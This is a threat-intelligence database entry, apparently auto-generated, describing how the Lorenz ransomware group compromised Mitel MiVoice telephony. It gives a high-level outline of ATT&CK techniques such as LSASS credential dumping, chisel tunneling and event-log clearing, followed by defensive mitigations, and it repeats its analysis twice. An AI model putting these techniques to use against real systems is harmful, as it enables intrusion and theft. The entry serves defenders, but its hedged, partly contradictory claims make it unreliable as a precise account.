Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
AI Analysis
Technical Summary
The threat involves the Lorenz ransomware group exploiting vulnerabilities related to Mitel MiVoice, a unified communications platform widely used in enterprise telephony. The group reportedly cracked MiVoice systems, enabling them to make unauthorized calls without cost to themselves, indicating a compromise of telephony infrastructure. Lorenz ransomware is known for its sophisticated attack techniques, including exploitation of public-facing applications, deployment of web shells, use of encrypted communication channels, and credential harvesting from LSASS memory. The attack chain involves multiple MITRE ATT&CK techniques such as exploitation of public-facing applications (T1190), use of proxy tools (T1090), execution of PowerShell and Windows command shells (T1059.001, T1059.003), modification of registry keys (T1112), scheduled task creation for persistence (T1053, T1053.005), and discovery of system network configurations and security software (T1016, T1518.001). The ransomware encrypts data for impact (T1486) and may perform system shutdown or reboot to enforce encryption effects (T1529), while also clearing Windows event logs (T1070.001) to cover tracks. The use of chisel tools (both ELF and Windows variants) suggests tunneling or proxying capabilities to maintain covert communication channels. Although no known exploits in the wild are reported, the threat level is assessed as moderate (4 out of 10), with a low severity rating assigned by the source. The attack requires initial access to public-facing applications, which may be facilitated by misconfigurations or unpatched vulnerabilities. The lack of specific affected versions and patch links indicates that this is an open investigation or an intelligence report based on OSINT with moderate certainty (50%).
Potential Impact
For European organizations, especially those relying on Mitel MiVoice telephony systems, this threat poses risks to both operational continuity and data confidentiality. Compromise of telephony infrastructure can lead to unauthorized call usage, resulting in financial losses and potential exposure of sensitive communications. The ransomware component threatens data integrity and availability by encrypting critical files, potentially disrupting business operations. The use of advanced persistence and evasion techniques complicates detection and remediation efforts. Organizations in sectors with high reliance on unified communications, such as finance, healthcare, and government, may face amplified impacts. Additionally, the clearing of event logs and obfuscation tactics hinder forensic investigations, delaying incident response. The threat also raises concerns about insider risk and lateral movement within networks, as credential theft and remote desktop protocol exploitation are part of the attack methodology. Given the interconnected nature of European telecommunication and enterprise networks, a successful attack could propagate effects beyond a single organization, affecting supply chains and service providers.
Mitigation Recommendations
European organizations should implement targeted mitigations beyond generic advice: 1) Conduct thorough security assessments of Mitel MiVoice deployments, ensuring all components are updated to the latest vendor-recommended versions and configurations. 2) Harden public-facing applications by enforcing strict access controls, multi-factor authentication, and network segmentation to limit exposure. 3) Monitor telephony systems for anomalous call patterns and unauthorized usage to detect potential compromise early. 4) Deploy endpoint detection and response (EDR) solutions capable of identifying behaviors associated with credential dumping, PowerShell abuse, and scheduled task creation. 5) Implement robust logging and centralized log management with tamper-evident storage to prevent log clearing from hindering investigations. 6) Restrict use of remote desktop protocols and enforce just-in-time access with strong authentication. 7) Conduct regular threat hunting exercises focusing on indicators related to chisel tunneling tools and encrypted command and control channels. 8) Develop and test incident response plans specific to ransomware and telephony system compromises, including backup and recovery strategies that cover unified communications infrastructure. 9) Collaborate with Mitel and cybersecurity information sharing organizations to receive timely threat intelligence and patches.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Belgium, Sweden
Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
Description
Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
AI-Powered Analysis
Technical Analysis
The threat involves the Lorenz ransomware group exploiting vulnerabilities related to Mitel MiVoice, a unified communications platform widely used in enterprise telephony. The group reportedly cracked MiVoice systems, enabling them to make unauthorized calls without cost to themselves, indicating a compromise of telephony infrastructure. Lorenz ransomware is known for its sophisticated attack techniques, including exploitation of public-facing applications, deployment of web shells, use of encrypted communication channels, and credential harvesting from LSASS memory. The attack chain involves multiple MITRE ATT&CK techniques such as exploitation of public-facing applications (T1190), use of proxy tools (T1090), execution of PowerShell and Windows command shells (T1059.001, T1059.003), modification of registry keys (T1112), scheduled task creation for persistence (T1053, T1053.005), and discovery of system network configurations and security software (T1016, T1518.001). The ransomware encrypts data for impact (T1486) and may perform system shutdown or reboot to enforce encryption effects (T1529), while also clearing Windows event logs (T1070.001) to cover tracks. The use of chisel tools (both ELF and Windows variants) suggests tunneling or proxying capabilities to maintain covert communication channels. Although no known exploits in the wild are reported, the threat level is assessed as moderate (4 out of 10), with a low severity rating assigned by the source. The attack requires initial access to public-facing applications, which may be facilitated by misconfigurations or unpatched vulnerabilities. The lack of specific affected versions and patch links indicates that this is an open investigation or an intelligence report based on OSINT with moderate certainty (50%).
Potential Impact
For European organizations, especially those relying on Mitel MiVoice telephony systems, this threat poses risks to both operational continuity and data confidentiality. Compromise of telephony infrastructure can lead to unauthorized call usage, resulting in financial losses and potential exposure of sensitive communications. The ransomware component threatens data integrity and availability by encrypting critical files, potentially disrupting business operations. The use of advanced persistence and evasion techniques complicates detection and remediation efforts. Organizations in sectors with high reliance on unified communications, such as finance, healthcare, and government, may face amplified impacts. Additionally, the clearing of event logs and obfuscation tactics hinder forensic investigations, delaying incident response. The threat also raises concerns about insider risk and lateral movement within networks, as credential theft and remote desktop protocol exploitation are part of the attack methodology. Given the interconnected nature of European telecommunication and enterprise networks, a successful attack could propagate effects beyond a single organization, affecting supply chains and service providers.
Mitigation Recommendations
European organizations should implement targeted mitigations beyond generic advice: 1) Conduct thorough security assessments of Mitel MiVoice deployments, ensuring all components are updated to the latest vendor-recommended versions and configurations. 2) Harden public-facing applications by enforcing strict access controls, multi-factor authentication, and network segmentation to limit exposure. 3) Monitor telephony systems for anomalous call patterns and unauthorized usage to detect potential compromise early. 4) Deploy endpoint detection and response (EDR) solutions capable of identifying behaviors associated with credential dumping, PowerShell abuse, and scheduled task creation. 5) Implement robust logging and centralized log management with tamper-evident storage to prevent log clearing from hindering investigations. 6) Restrict use of remote desktop protocols and enforce just-in-time access with strong authentication. 7) Conduct regular threat hunting exercises focusing on indicators related to chisel tunneling tools and encrypted command and control channels. 8) Develop and test incident response plans specific to ransomware and telephony system compromises, including backup and recovery strategies that cover unified communications infrastructure. 9) Collaborate with Mitel and cybersecurity information sharing organizations to receive timely threat intelligence and patches.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Threat Level
- 4
- Analysis
- 0
- Original Timestamp
- 1666603345
Threat ID: 682acdbebbaf20d303f0c209
Added to database: 5/19/2025, 6:20:46 AM
Last enriched: 7/2/2025, 7:58:43 AM
Last updated: 8/11/2025, 1:58:48 PM
Views: 22
Related Threats
ThreatFox IOCs for 2025-08-18
MediumCVE-2025-43733: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Liferay Portal
LowCVE-2025-54234: Server-Side Request Forgery (SSRF) (CWE-918) in Adobe ColdFusion
LowCVE-2025-3639: CWE-288: Authentication Bypass Using an Alternate Path or Channel in Liferay Portal
LowWarLock Ransomware group Claims Breach at Colt Telecom and Hitachi
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.